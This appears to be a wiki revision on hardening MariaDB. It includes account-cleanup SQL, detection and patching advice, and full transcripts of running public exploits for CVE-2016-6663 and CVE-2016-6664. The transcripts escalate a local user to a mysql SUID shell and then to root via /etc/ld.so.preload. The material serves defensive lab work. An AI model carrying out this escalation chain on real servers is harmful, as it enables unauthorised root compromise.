Revision 2: 2016-11-11 (Fri) 11:48:56 iseki
Current:    2016-11-11 (Fri) 15:46:20 iseki
**** Default users [#c3c58224]
- Anonymous accounts (empty User) and accounts with an empty Password should be removed at install time. The anonymous account is what lets any local OS user connect to the server without credentials; it is exactly the account the PoC run further down connects with ('' '').
 MariaDB [(none)]> use mysql;
 MariaDB [mysql]> select Host,User,Password from user;
 +-----------+------+-------------------------------------------+
 | Host      | User | Password                                  |
 +-----------+------+-------------------------------------------+
 | rigel-b   |      |                                           |
 +-----------+------+-------------------------------------------+

- Delete them with the following commands. A direct DELETE on the grant tables is not picked up by the running server until FLUSH PRIVILEGES (or a restart), so that statement is added at the end. Note that the second DELETE also removes root@localhost if root has not been given a password yet; check the SELECT output above before running it.

 MariaDB [(none)]> use mysql;
 MariaDB [mysql]> delete from user where user='';
 MariaDB [mysql]> delete from user where password='';
 MariaDB [mysql]> flush privileges;

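Audit before deleting. The session below is an added example for this note, not the page author's own commands. It assumes the 2016-era MariaDB layout shown above, where mysql.user is a base table with Host, User and Password columns, and it assumes a second anonymous row ''@'localhost' next to the ''@'rigel-b' row in the output (a fresh install creates both). It first lists what the blanket `delete ... where password=''` would hit, then removes only the anonymous accounts and gives root a password instead of deleting it.

```sql
-- Added example, not from the original page. Run as root in the mysql client.
-- Assumes MariaDB 5.5 / 10.0 / 10.1 where mysql.user is a base table.
-- (On MariaDB 10.4 and later mysql.user is a view over mysql.global_priv:
--  use DROP USER / SET PASSWORD there and never DELETE from it.)

-- 1. Audit: which rows are anonymous, which have an empty password hash.
--    On a fresh install root@localhost usually appears here too, which is
--    why a blanket DELETE ... WHERE Password = '' is dangerous.
SELECT Host, User,
       (User = '')     AS anonymous,
       (Password = '') AS empty_password
FROM mysql.user
WHERE User = '' OR Password = ''
ORDER BY User, Host;

-- 2. Remove the anonymous accounts with DROP USER rather than DELETE:
--    DROP USER refreshes the in-memory privilege cache and also removes the
--    matching rows in mysql.db / mysql.tables_priv.
DROP USER ''@'rigel-b';     -- host name taken from the SELECT output above
DROP USER ''@'localhost';   -- assumed second anonymous row of a fresh install

-- 3. Passwordless root: set a password, do not delete the row.
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('<choose a strong password>');

-- 4. Remote root logins are rarely needed; drop any that exist.
DELETE FROM mysql.user
WHERE User = 'root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');

-- 5. Needed only because step 4 used a direct DELETE on the grant table;
--    DROP USER and SET PASSWORD already refresh the cache.
FLUSH PRIVILEGES;

-- 6. Verify: expect an empty result set.
SELECT Host, User FROM mysql.user WHERE User = '' OR Password = '';
```

The `anonymous` / `empty_password` columns in step 1 make it obvious at a glance which rule each row matches, so the decision to drop a row or to set a password on it is made per row rather than by a single blanket statement.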
**** Dash into the mysql user account (privilege-escalation race) [#z9d7510f]

Running Dawid Golunski's PoC for CVE-2016-6663 (a race in MyISAM table repair that ends with mysqld setting the SUID bit on a file under the table's DATA DIRECTORY) as the unprivileged user iseki. The connection uses an empty user name and an empty password, i.e. the anonymous account from the section above, against the `test` database:
 [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test
 
 MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
 mysql-privesc-race.c (ver. 1.0)
 
 CVE-2016-6663 / CVE-2016-5616
 
 For testing purposes only. Do no harm.
 
 Discovered/Coded by:
 
 Dawid Golunski
 http://legalhackers.com
 
 
 [+] Starting the exploit as:
 uid=502(iseki) gid=100(users) groups=100(users)
 
 [+] Connecting to the database `test` as @localhost
 
 [+] Creating exploit temp directory /tmp/mysql_privesc_exploit
 
 [+] Creating mysql tables
 
 DROP TABLE IF EXISTS exploit_table
 DROP TABLE IF EXISTS mysql_suid_shell
 CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
 CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
 
 [+] Copying bash into the mysql_suid_shell table.
 After the exploitation the following file/table will be assigned SUID and executable bits :
 -rw-rw---- 1 mysql users 941880 Nov 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
 
 [+] Entering the race loop... Hang in there...
 ->->->->->->->->->->->->->->->->->->  (progress indicator, trimmed)
 
 [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell:
 
 -rwsrwxrwx 1 mysql users 941880 Nov 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
 
 [+] Spawning the mysql SUID shell now...
 Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
 
 mysql_suid_shell.MYD-4.1$ whoami
 mysql

From that set-uid-mysql shell, the second PoC (CVE-2016-6664) is pointed at the server's error log /var/mysql/rigel-b.err, the file that mysqld_safe recreates and chowns to mysql as root on restart. pidof was not available on this host, so the script fell back to asking whether to kill mysqld, which triggers the restart:

 mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err
 
 MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit
 mysql-chowned.sh (ver. 1.0)
 
 CVE-2016-6664 / CVE-2016-5617
 
 Discovered and coded by:
 
 Dawid Golunski
 http://legalhackers.com
 
 [+] Starting the exploit as
 uid=502(iseki) gid=100(users) euid=103(mysql) groups=100(users)
 
 [+] Target MySQL log file set to /var/mysql/rigel-b.err
 
 [+] Compiling the privesc shared library (/tmp/privesclib.c)
 
 [+] Backdoor/low-priv shell installed at:
 -rwxr-xr-x 1 mysql users 941880 Nov 11 09:52 2016 /tmp/mysqlrootsh
 
 [+] Symlink created at:
 lrwxrwxrwx 1 mysql users 18 Nov 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload
 
 [+] Waiting for MySQL to re-open the logs/MySQL service restart...
 
 [+] Waiting for MySQL to re-open the logs/MySQL service restart...
 ./mysql-chowned.sh: line 153: pidof: command not found
 Do you want to kill mysqld process to instantly get root? :) ? [y/n] y
 Got it. Executing 'killall mysqld' now...
 
 [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges:
 -rw-r----- 1 mysql root 19 Nov 11 09:52 2016 /etc/ld.so.preload
 
 [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
 
 [+] The /etc/ld.so.preload file now contains:
 /tmp/privesclib.so
 
 [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
 -rwsrwxrwx 1 root root 941880 Nov 11 09:52 2016 /tmp/mysqlrootsh
 
 [+] Rootshell got assigned root SUID perms at:
 -rwsrwxrwx 1 root root 941880 Nov 11 09:52 2016 /tmp/mysqlrootsh
 
 Got root! The database server has been ch-OWNED !
 
 [+] Spawning the rootshell /tmp/mysqlrootsh now!
 
 mysqlrootsh-4.1# whoami
 root
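The two transcripts show what the chain leaves on disk: a set-uid-mysql `.MYD` file in a MyISAM DATA DIRECTORY under /tmp, the error log replaced by a symlink to /etc/ld.so.preload, a mysql-owned /etc/ld.so.preload naming a library in /tmp, and a set-uid-root shell in /tmp. The check below is an added example, neither part of this page nor Dawid Golunski's code; it looks for exactly those artefacts. It assumes a Unix host with POSIX sh, ls, find, grep and readlink. The data-directory paths /var/lib/mysql and /var/mysql are assumed defaults, the log path is the one from the transcript, and the ROOT prefix lets it run against a mounted image or a constructed test tree instead of the live system.

```sh
#!/bin/sh
# Added example, not from the original page or from the PoC author.
# Checks for the three artefacts the CVE-2016-6663 / CVE-2016-6664 PoC runs
# leave behind. ROOT is a path prefix ("" for the live host, or a mounted
# image / constructed tree); ERRLOG is the mysqld error log path from my.cnf.
# Plain POSIX sh: no bashisms, and variables are global since sh has no 'local'.

# Usage: check_mysql_privesc_indicators ROOT ERRLOG
# Prints one "FINDING:" block per indicator. The return code is the number of
# findings, so 0 means clean and the function can be used as a test.
check_mysql_privesc_indicators() {
    root=${1%/}
    errlog=$2
    count=0

    # 1. /etc/ld.so.preload. Stock systems do not ship it. CVE-2016-6664
    #    creates it owned by mysql ("created with mysql privileges" above)
    #    and fills it with a library path under /tmp. The dynamic loader
    #    honours this file even for set-uid programs, so any entry in a
    #    world-writable directory is a root-level backdoor.
    preload="$root/etc/ld.so.preload"
    if [ -e "$preload" ]; then
        owner=$(ls -ld "$preload" | awk '{print $3}')
        if [ "$owner" != "root" ]; then
            echo "FINDING: $preload exists and is owned by '$owner', not root"
            count=$((count + 1))
        fi
        if grep -Eq '^[[:space:]]*/(tmp|var/tmp|dev/shm)/' "$preload"; then
            echo "FINDING: $preload preloads a library from a world-writable directory:"
            grep -E '^[[:space:]]*/(tmp|var/tmp|dev/shm)/' "$preload" | sed 's/^/    /'
            count=$((count + 1))
        fi
    fi

    # 2. The error log turned into a symlink: the step the chowned PoC
    #    performs before waiting for mysqld_safe to chown the link target.
    if [ -L "$root$errlog" ]; then
        echo "FINDING: error log $errlog is a symlink -> $(readlink "$root$errlog")"
        count=$((count + 1))
    fi

    # 3. set-uid files in /tmp or the MySQL data directories (assumed
    #    defaults /var/lib/mysql and /var/mysql). The race PoC leaves a
    #    set-uid-mysql bash as <table>.MYD in the table's DATA DIRECTORY,
    #    the chowned PoC a set-uid-root shell in /tmp.
    #    '|| true' keeps 'set -e' callers alive when a directory is absent.
    suid_files=$(find "$root/tmp" "$root/var/lib/mysql" "$root/var/mysql" \
                      -xdev -type f -perm -4000 2>/dev/null || true)
    if [ -n "$suid_files" ]; then
        echo "FINDING: set-uid files in temp or MySQL data directories:"
        # unquoted on purpose: one path per line, no spaces expected here
        ls -l $suid_files | sed 's/^/    /'
        count=$((count + $(printf '%s\n' "$suid_files" | wc -l)))
    fi

    return "$count"
}

# Stand-alone use on the live host, as root:
#   check_mysql_privesc_indicators "" /var/mysql/rigel-b.err; echo "findings: $?"
```

On the prevention side, the race PoC needs `DATA DIRECTORY` to point outside the data directory, which `symbolic-links=0` (`--skip-symbolic-links`) in my.cnf disables, and the chowned PoC needs the unpatched mysqld_safe that chowns the error log as root; Golunski's advisory lists MariaDB 5.5.52, 10.0.28 and 10.1.18 as fixed for both CVEs. Removing the anonymous account, as described in the first section, closes the entry point the whole chain started from.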